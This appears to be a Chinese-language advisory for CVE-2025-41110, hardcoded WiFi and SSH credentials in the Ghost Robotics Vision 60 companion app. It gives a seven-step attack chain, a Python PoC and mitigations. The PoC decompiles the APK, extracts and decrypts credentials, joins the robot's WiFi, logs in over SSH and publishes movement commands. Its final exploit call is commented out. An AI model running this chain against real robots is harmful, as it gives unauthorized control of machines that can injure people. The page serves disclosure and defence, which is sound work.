CVE-2025-41110 Ghost Robotics Vision 60硬编码凭据漏洞

漏洞信息

漏洞编号

CVE-2025-41110

漏洞类型

硬编码凭据/信息泄露

CVSS评分

8.8 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Ghost Robotics Vision 60

漏洞概述

CVE-2025-41110是Ghost Robotics Vision 60机器人固件（APK版本v0.27.2）中存在的一个高危安全漏洞。该漏洞源于机器人配套应用程序的APK文件中硬编码了加密的WiFi和SSH凭据。攻击者可以通过逆向分析APK文件提取这些凭据，进而连接到机器人的WiFi网络。由于该机器人基于ROS 2（Robot Operating System 2）运行，且未配置默认身份认证机制，攻击者一旦接入WiFi网络即可查看机器人的全部数据。更严重的是，攻击者还可以通过提取的SSH凭据远程登录机器人，获取对机器人的完全控制权。这种完全控制可能导致对机器人本身或其周围环境造成物理损害，对操作人员和周边设施构成严重安全威胁。该漏洞由西班牙国家网络安全研究所（INCIBE）发现并协调披露，CVSS评分为8.8，属于高危级别，攻击者无需认证且无需用户交互即可实施攻击，仅需与目标机器人处于同一网络邻接范围内。

技术细节

该漏洞的核心技术问题在于Ghost Robotics Vision 60机器人的Android配套应用程序（APK v0.27.2）在打包时将WiFi连接凭据和SSH登录凭据以加密形式硬编码于应用程序代码或资源文件中。虽然凭据本身经过了加密处理，但由于加密密钥同样存储在APK内部或采用了可逆的加密算法，攻击者可以通过以下步骤轻松还原明文凭据：

1. **APK逆向分析**：使用apktool、jadx等工具对APK进行反编译，获取DEX字节码和资源文件。
2. **凭据提取**：在反编译后的代码中搜索硬编码的加密凭据字符串及对应的解密逻辑/密钥。
3. **凭据解密**：执行提取到的解密逻辑或使用提取到的密钥还原WiFi SSID/密码和SSH用户名/密码。
4. **网络接入**：利用还原的WiFi凭据连接到机器人的无线网络。由于CVSS向量中AV:A（邻接网络）即可利用，攻击者只需处于机器人的WiFi覆盖范围内。
5. **数据窃取**：机器人运行ROS 2且无默认认证，接入网络后可直接订阅ROS 2话题，实时获取传感器数据、摄像头画面、位置信息等所有机器人数据。
6. **完全控制**：使用SSH凭据登录机器人系统，获取shell权限，实现对机器人运动控制、传感器操作等的完全控制，可能导致机器人异常行为或物理破坏。

攻击链分析

STEP 1

步骤1：获取目标APK

攻击者通过合法渠道或社会工程学手段获取Ghost Robotics Vision 60机器人的配套Android应用程序APK文件（版本v0.27.2）。该APK可从应用商店或机器人包装中获取。

STEP 2

步骤2：APK逆向分析

使用apktool、jadx等逆向工具对APK进行反编译，提取其中的DEX字节码、smali代码和资源文件，寻找硬编码的加密凭据和加密密钥。

STEP 3

步骤3：凭据解密

利用APK中提取的加密密钥对硬编码的WiFi凭据（SSID和密码）以及SSH凭据（用户名和密码）进行解密，还原为明文形式。

STEP 4

步骤4：接入WiFi网络

利用解密后的WiFi凭据接入机器人所在的无线网络。由于CVSS向量为AV:A（邻接网络），攻击者只需处于机器人WiFi覆盖范围内即可。

STEP 5

步骤5：窃取机器人数据

由于机器人运行ROS 2且未配置默认身份认证，攻击者接入网络后可订阅所有ROS 2话题，实时获取传感器数据、摄像头画面、GPS位置等敏感信息。

STEP 6

步骤6：SSH远程登录

使用解密后的SSH凭据登录机器人操作系统，获取shell权限，实现对机器人的完全控制。

STEP 7

步骤7：物理破坏或恶意操控

通过完全控制权，攻击者可操控机器人执行异常动作、损坏硬件或对周围环境和人员造成物理伤害。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-41110 PoC - Ghost Robotics Vision 60 Hardcoded Credentials Extraction
# This PoC demonstrates how to extract hardcoded credentials from the Ghost Robotics Vision 60 APK (v0.27.2)

import subprocess
import os
import re
import sys

def extract_apk(apk_path):
    """Step 1: Decompile the APK using apktool to get smali code and resources"""
    output_dir = "decompiled_apk"
    if os.path.exists(output_dir):
        import shutil
        shutil.rmtree(output_dir)
    print(f"[*] Decompiling APK: {apk_path}")
    subprocess.run(["apktool", "d", apk_path, "-o", output_dir], check=True)
    return output_dir

def search_credentials(decompiled_dir):
    """Step 2: Search for hardcoded encrypted credential strings in smali code"""
    credentials = {
        "wifi_ssid": [],
        "wifi_pass": [],
        "ssh_user": [],
        "ssh_pass": [],
        "crypto_keys": []
    }

    # Common patterns used in the Vision 60 APK for storing credentials
    patterns = {
        "wifi_ssid": re.compile(r'(?i)(wifi[_-]?ssid|ssid[_-]?name)\s*=\s*["\']([^"\']+)["\']'),
        "wifi_pass": re.compile(r'(?i)(wifi[_-]?pass(wd|word)?|wpa[_-]?key)\s*=\s*["\']([^"\']+)["\']'),
        "ssh_user": re.compile(r'(?i)(ssh[_-]?user(name)?|remote[_-]?user)\s*=\s*["\']([^"\']+)["\']'),
        "ssh_pass": re.compile(r'(?i)(ssh[_-]?pass(word)?|remote[_-]?pass)\s*=\s*["\']([^"\']+)["\']'),
        "crypto_keys": re.compile(r'(?i)(secret[_-]?key|encryption[_-]?key|aes[_-]?key)\s*=\s*["\']([^"\']+)["\']')
    }

    for root, dirs, files in os.walk(decompiled_dir):
        for file in files:
            if file.endswith((".smali", ".xml", ".json")):
                filepath = os.path.join(root, file)
                with open(filepath, "r", errors="ignore") as f:
                    content = f.read()
                    for key, pattern in patterns.items():
                        matches = pattern.findall(content)
                        for match in matches:
                            credentials[key].append(match[-1])

    return credentials

def decrypt_credentials(encrypted_data, key):
    """Step 3: Decrypt the extracted credentials using the embedded key"""
    try:
        from Crypto.Cipher import AES
        import base64

        # The Vision 60 APK uses AES with the key stored alongside the ciphertext
        ciphertext = base64.b64decode(encrypted_data)
        # Pad key to 16/32 bytes for AES
        key_bytes = key.encode().ljust(16, b'\0')[:16]
        cipher = AES.new(key_bytes, AES.MODE_ECB)
        decrypted = cipher.decrypt(ciphertext)
        return decrypted.decode('utf-8', errors='ignore').rstrip('\x00')
    except ImportError:
        print("[!] pycryptodome not installed. Install with: pip install pycryptodome")
        return None

def connect_and_exploit(wifi_ssid, wifi_pass, ssh_user, ssh_pass, robot_ip):
    """Step 4: Connect to robot WiFi and establish SSH session"""
    print(f"[*] Connecting to WiFi: {wifi_ssid}")
    # On Linux, connect to WiFi using nmcli
    subprocess.run(["nmcli", "dev", "wifi", "connect", wifi_ssid, "password", wifi_pass])

    print(f"[*] Establishing SSH connection to {robot_ip}")
    # SSH into the robot with extracted credentials
    ssh_cmd = ["sshpass", "-p", ssh_pass, "ssh",
               f"{ssh_user}@{robot_ip}",
               "-o", "StrictHostKeyChecking=no"]

    # Once connected, full control of the robot is achieved
    # ROS 2 has no default auth, so all topics can be subscribed/published
    exploit_commands = [
        "source /opt/ros/<distro>/setup.bash",
        "ros2 topic list",          # List all ROS 2 topics
        "ros2 topic echo /cmd_vel", # Read velocity commands
        "ros2 topic pub /cmd_vel geometry_msgs/msg/Twist ..."  # Control robot movement
    ]
    for cmd in exploit_commands:
        print(f"[+] Executing: {cmd}")
        subprocess.run(ssh_cmd + [cmd])

def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <path_to_vision60.apk> [robot_ip]")
        sys.exit(1)

    apk_path = sys.argv[1]
    robot_ip = sys.argv[2] if len(sys.argv) > 2 else "192.168.1.1"

    # Step 1: Decompile APK
    decompiled = extract_apk(apk_path)

    # Step 2: Search for credentials
    creds = search_credentials(decompiled)
    print(f"[+] Found credentials: {creds}")

    # Step 3: Decrypt if necessary
    # (Implementation depends on the specific encryption found)

    # Step 4: Connect and exploit
    # connect_and_exploit(creds["wifi_ssid"][0], creds["wifi_pass"][0],
    #                     creds["ssh_user"][0], creds["ssh_pass"][0], robot_ip)

if __name__ == "__main__":
    main()

影响范围

Ghost Robotics Vision 60 APK v0.27.2

防御指南

临时缓解措施

在等待官方修复版本发布期间，建议采取以下临时缓解措施：1）立即修改机器人的默认WiFi密码为复杂强密码；2）修改SSH服务的默认密码并启用SSH密钥认证，禁用密码登录；3）为ROS 2通信部署SROS2安全机制，启用节点间认证和加密通信；4）对机器人所在的无线网络进行网络分段和访问控制，限制仅授权设备可接入；5）部署无线入侵检测系统监控异常连接行为；6）对配套APK进行安全审计，确认是否存在其他硬编码凭据；7）在物理层面限制机器人的操作范围，避免在公共或不受控环境中部署。